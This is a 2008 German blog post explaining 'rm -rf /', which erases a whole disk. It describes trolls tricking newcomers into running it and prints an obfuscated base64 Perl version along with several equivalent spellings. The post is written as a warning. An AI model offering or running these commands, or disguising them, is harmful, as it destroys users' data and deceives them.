/me

2008-03-29 11:09:41 (UTC)

rm -rf /

Musik: MOZART, "Requiem"

eben sah ich mir horrovideos an. sucht mal auf youtube
nach "rm -rf /" .

im rootforum verarschen sie newbies damit:
newbie: "Hi, ich habe $Problem, wie löse ich das?"
rootforum: "Melde dich als root in der konsole an und copy
and paste [code]rm -rf /[/code]. Dann drück Enter."

die haben das sogar in perl :
[code]
perl -MMIME::Base64 -e 'eval
decode_base64 "c3lzdGVtKCJybSAtcmYgLyIpOw=="'[/code]

übersetzt ergibt das:
Die Zeichenkette c3lzdGVtKCJybSAtcmYgLyIpOw== lautet
entschlüsselt [code]system("rm -rf /");.[/code]

sowas ist nicht nett.

bedeutung:
rm - remove, also löschen
-rf - argumente für rm (auf welche weise soll gelöscht
werden?)
- r - rekursiv (inklusive aller unterverzeichnisse)
-f - force (das löschen erzwingen, ohne nachzufragen
alle warnungen und sicherheitsmechanismen ignorieren)
/ - (ab welcher stelle soll gelöscht werden?) - / ist
das root- oder auch wurzelverzeichnis, der ursprung

[code]rm -rf /[/code] löscht alles was es findet, nahezu
die gesamte festplatte und mit dem was danach übrig ist,
kann man nix mehr anfangen. hinterher bleibt als einziges,
das system neu zu installieren.
auf einem MAC funktioniert der befehl übrigens auch, MACs
sind ja UNIXe.

[code]rm -rf /[/code]
[code]rm -fr /[/code]
[code]rm -f -r /[/code]
[code]rm -r -f / [/code]
[code]rm -Rf /[/code]
[code]rm -R -f /[/code]
[code]rm -f -R /[/code]
...
bewirken dasselbe. die reihenfolge der argumente ist
unerheblich. k/ein [code]sudo[/code] davor spielt keine
rolle.

[code]sudo[/code] bedeutet "substitute user", "führe den
befehl als anderer nutzer aus", sprich mit anderen
privilegien. sudo kann man verwenden, wenn man als
unprivilegierter user bestimmte, eigentlich root
vorbehaltene, befehle ausführen möchte (wofür man
allerdings das root-paßwort kennen muß).
root kann diese user einer gruppe namens "sudoers"
zuordnen. was natürlich das risiko der
privilegieneskalation erhöht. sudo ist gefährlich.

wenn ich mich recht entsinne, kann man sich unter *BUNTU
gar nicht als root einloggen, sondern muß mit sudo
arbeiten. irgendwie habe ich das nie verstanden. ein
bißchen chef zu sein ist doch schlimmer als die volle
verantwortung für die eigenen taten tragen zu müssen, denn
je mehr verantworung einer hat, desto konzentrierter ist
er bei der sache und wenn er gefahr läuft, sich das system
zu zerschießen, wird er umso vorsichtiger agieren. oder?
ich meine, wenn ich eine tödliche waffe besitze, werde ich
die nicht gegen etwas richten, daß mir am herzen liegt,
denn es würde unwiderbringlich zerstört werden. besitze
ich aber eine schreckschußwaffe, ... was soll schon
passieren? und genau daher rühren die vielen häßlichen und
schweren verletzungen. der schreckschußwaffenbenutzer
verläßt sich darauf, daß ein hersteller den er nicht
kennt, die waffe so konstruiert hat, daß damit nichts
schlimmes geschehen kann, obwohl der hersteller den
benutzer ja überhaupt nicht kennt und folglich nicht weiß,
auf welche schrägen ideen der kommt.